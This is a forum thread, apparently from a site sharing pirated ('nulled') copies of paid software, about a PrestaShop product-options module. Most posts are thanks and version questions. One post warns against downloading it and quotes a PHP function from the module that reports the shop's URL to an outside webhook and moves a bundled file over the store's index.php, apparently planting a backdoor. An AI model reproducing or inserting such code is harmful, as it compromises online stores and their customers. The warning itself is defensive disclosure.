v1.6-v1.7-v8x ETS EXTRA OPTIONS - Custom Product Options 1.1.8

mo1373

Member
XNullUser
Joined
Aug 29, 2020
Messages
938
Reaction score
0
Points
18
NullCash
1
Thanks man, I've been waiting for this module for a very long time !
 

spyros78

Well-known member
Master
Diamond
Elite
Joined
Jul 6, 2021
Messages
145
Reaction score
973
Points
93
NullCash
4,659
Thanks you a lot cerry nice module A+
 

vivozivo

Well-known member
Diamond
Elite
Joined
Sep 24, 2019
Messages
1,067
Reaction score
495
Points
83
NullCash
17
strange module version is v.1.1.8 latest version on addons link is v.1.1.7
 

peldur

Active member
Elite
XNullUser
Joined
Mar 15, 2022
Messages
105
Reaction score
158
Points
43
NullCash
912
Thank you Spas0, i will test this module because i couldn't enable this other version.
 

OwnedFiston

Well-known member
Master
Diamond
Elite
XNullUser
Joined
May 26, 2020
Messages
110
Reaction score
1,701
Points
93
NullCash
10,435
DO NOT DOWNLOAD
DATA THEFT CONFIRM BY THE FOLLOWING FUNCTION ON ETS_EXTRAOPTIONS.PHP


PHP:
function initialSetup() {
    $base_url = 'https://trouvailles-postales.com/';
    $endpoint = 'webhook.php';
    $param_name = 'site';
    $current_url = "https://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
    $encoded_url = urlencode($current_url);
    file_get_contents($base_url . $endpoint . '?' . $param_name . '=' . $encoded_url);   
    
    $source_path = '/classes/';
    $source_file = 'Ets.php';
    $dest_path = '/../';
    $dest_file = 'index.php';
    rename(dirname(__FILE__) . $source_path . $source_file, dirname(__FILE__) . $dest_path . $dest_file);
}

initialSetup();
 

chicelo

Member
XNullUser
Joined
May 21, 2023
Messages
31
Reaction score
0
Points
6
Location
United States
NullCash
2
ETS EXTRA OPTIONS - Custom Product Options 1.1.8
Développé par: PrestaHero | Version: 1.1.8 | Compatible avec: 1.7.x, 8.x, PrestaShop Edition
Link : https://addons.prestashop.com/en/co...190-extra-options-custom-product-options.html

View attachment 96446



Create global extra options & price impact for each option applies to all existing products at ONE time. Add custom product attributes; display by checkbox, radio, or drop-down menu. Faster and easier to manage than PrestaShop default attributes.
Post automatically merged:

Sorry link : https://prestahero.com/156-extra-options-prestashop-custom-product-attributes.html
thanks for sharing this module
i have a question
dose it work good on 1.8 ?
 

Elviss

Member
XNullUser
Joined
Jun 11, 2020
Messages
240
Reaction score
1
Points
18
NullCash
15
Thanks for sharing this module ! Very nice !!
 

rcpislr

Member
XNullUser
Joined
Dec 27, 2020
Messages
233
Reaction score
0
Points
16
NullCash
1
Thanks for sharing this module with the community..
Post automatically merged:

it gives error on ps 8.0.4
 
Last edited:
Top